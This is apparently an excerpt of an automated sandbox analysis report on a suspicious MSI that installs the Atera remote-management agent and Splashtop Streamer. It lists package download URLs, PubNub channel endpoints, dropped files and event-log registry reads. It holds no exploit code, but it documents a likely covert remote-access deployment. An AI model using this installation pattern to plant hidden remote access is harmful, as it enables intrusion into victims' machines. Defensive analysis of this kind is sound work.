                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.3/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/37.9/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14D5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.z
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/37.9/AgentPackageAgentInformati
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zipp
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip?KKgGC
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14D5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscove
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/20.0/AgentPackageOsUpdates.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/25.8/AgentPackageProgramManage
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageRuntimeInstaller/1.6/AgentPackageRuntimeInstalle
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zip?KKgGC7fCc
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.6/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.9/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.9/AgentPackageTicketing.zip?KKgGC7f
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.2/AgentPackageUpgradeAgent.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exe
                                Source: AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exepUsers/Shared/Splashtop
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1467000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1467000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CC3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=00370d56-8b21-43a9-8b87-a8ec77571e56
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=0efe0bbf-2a0e-40d8-965f-19f51f0fd321
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bfbcf15-78c5-42b3-a888-e57cf083e16d
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=737ec693-90a8-4422-9ac8-a4ec4dd18ff5
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=abea1582-463a-4a7f-add0-13f90d8f2650
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b8910c6f-67a0-4f27-ab84-5ffd997cd0c5
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=d356e0ff-7cf6-451a-abfd-493cb798864d
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=da8a8aee-d717-4843-aaf8-93981205c3dc
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=e67ebcbd-5956-47bb-95bb-73cf0832e6de
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/bc2f6fef
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-b
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/bc2f6fef-7e04-492a-b3
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1695000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/bc2f6fef-7e04-492a-b3cb
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: https://www.digicert.com/CPS0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                Source: NLog.dll.24.drString found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2280646482.0000020AB9882000.00000002.00000001.01000000.0000001E.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955108650.000001BE62AF2000.00000002.00000001.01000000.00000019.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2669791407.00000217326D0000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                Source: PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, libssl-3.dll.1.drString found in binary or memory: https://www.openssl.org/H
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0040EBA4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW,36_2_0040EBA4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Reads the Security eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AlphaAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Reads the System eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00428880: CreateFileW,DeviceIoControl,CloseHandle,36_2_00428880
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sysJump to behavior
